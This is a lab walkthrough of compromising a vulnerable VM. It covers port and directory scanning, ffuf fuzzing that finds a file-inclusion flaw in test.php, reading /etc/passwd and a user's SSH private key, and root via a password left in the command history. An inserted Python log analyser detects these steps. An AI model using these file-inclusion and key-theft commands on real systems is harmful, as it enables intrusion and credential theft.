Lab setup
Download and import the VM, boot it, and it is ready to use.
IP: 192.168.1.138
Penetration process
Initial information gathering
The CMS on port 80 is CMS Made Simple 2.2.15. There is an RCE that can be exploited, but it requires being logged in.
Looking through the site's content, there are two users, qiu and patrick. There is also a hint about a backdoor, which is presumably that RCE.
22/tcp open ssh
80/tcp open http
111/tcp closed rpcbind
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
8000/tcp closed http-alt
8080/tcp closed http-proxy
8443/tcp closed https-alt
9090/tcp open zeus-admin
10080/tcp closed amanda
10443/tcp closed cirrossp
Directory enumeration; filter out the useful entries:
[01:51:48] 200 - 17B - /phpinfo.php
[01:52:07] 200 - 80B - /test.php
[01:52:09] 200 - 1KB - /tmp/
[01:52:11] 200 - 0B - /uploads/
The test.php page needs a parameter, so let's fuzz for one.
Fuzzing needs a serious wordlist, so install seclists first.
Then use ffuf to fuzz the parameter: first fuzz the parameter name, testing for LFI.
┌──(root㉿kali)-[~]
└─# ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.1.138/test.php?FUZZ=/etc/passwd' -fs 80
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.1.138/test.php?FUZZ=/etc/passwd
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 80
________________________________________________
file [Status: 200, Size: 1633, Words: 36, Lines: 33, Duration: 36ms]
:: Progress: [4727/4727] :: Job [1/1] :: 1025 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
Found a file inclusion through the file parameter. From the passwd file we can see that the qiu user has a bash shell.
So keep using the file inclusion to look for sensitive files. shadow can't be included, so include qiu's SSH private key instead.
Download it directly: wget http://192.168.1.138/test.php?file=/home/qiu/.ssh/id_rsa -O id_rsa
That's it, folks: SSH in with the private key and we're on a terminal.
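As an added, defender-side example (not part of the original writeup): both of the steps above, the parameter-name fuzz against test.php and the include of /home/qiu/.ssh/id_rsa, leave a clear footprint in the web server's access log. The Python below parses Apache combined-format lines and flags query values that name sensitive files, plus any single client that tries an unusual number of distinct parameter names against one script. The log lines and the attacker address 10.0.0.5 are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs, unquote

# Matches the start of an Apache "combined" access-log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')

# Values that should never show up in an include-style query parameter.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/.ssh/id_rsa", "../")

def parse_line(line):
    """Parse one log line into a dict with decoded query parameters, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    u = urlparse(d["url"])
    d["path"] = u.path
    d["params"] = {k: unquote(v[0]) for k, v in
                   parse_qs(u.query, keep_blank_values=True).items()}
    return d

def flag_sensitive_values(entries):
    """(ip, path, param, value) for every query value that names a sensitive file."""
    return [(e["ip"], e["path"], k, v) for e in entries
            for k, v in e["params"].items() if any(s in v for s in SENSITIVE)]

def flag_param_fuzzing(entries, min_distinct=20):
    """(ip, path) -> number of distinct parameter NAMES, where that number is large.
    One client sending many different names to one script is the footprint of a
    parameter-name fuzz (ffuf ...?FUZZ=...), not of normal browsing."""
    names = defaultdict(set)
    for e in entries:
        names[(e["ip"], e["path"])].update(e["params"])
    return {k: len(v) for k, v in names.items() if len(v) >= min_distinct}

# Constructed sample log: 25 fuzz probes (only "file" returns a different size),
# the follow-up read of the private key, and one normal request from another client.
_FUZZ = "id page q view name action cat dir path url src doc p s lang tpl inc t u x y z a b file".split()
SAMPLE_LOG = [
    f'10.0.0.5 - - [01/Jan/2024:01:51:50 +0000] "GET /test.php?{n}=/etc/passwd HTTP/1.1" '
    f'{"200 1633" if n == "file" else "200 80"} "-" "-"' for n in _FUZZ
] + [
    '10.0.0.5 - - [01/Jan/2024:01:55:02 +0000] "GET /test.php?file=/home/qiu/.ssh/id_rsa HTTP/1.1" 200 1823 "-" "-"',
    '10.0.0.9 - - [01/Jan/2024:01:55:10 +0000] "GET /index.php?page=2 HTTP/1.1" 200 4210 "-" "-"',
]

def analyse(lines=SAMPLE_LOG):
    """Return (sensitive-value hits, fuzzing clients) for a list of log lines."""
    entries = [e for e in map(parse_line, lines) if e]
    return flag_sensitive_values(entries), flag_param_fuzzing(entries)

if __name__ == "__main__":
    hits, fuzzers = analyse()
    for hit in hits:
        print("sensitive value:", hit)
    for (ip, path), n in fuzzers.items():
        print(f"param fuzz: {ip} tried {n} distinct parameter names on {path}")
```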
Privilege escalation
After logging in as qiu, sudo asks for a password. Checking the command history, the fourth entry is the password: remarkablyawesomE
sudo su
Root, straight away!
Summary
When fuzzing parameters, you need to filter out the normal response size, and you need to be familiar with the various wordlists.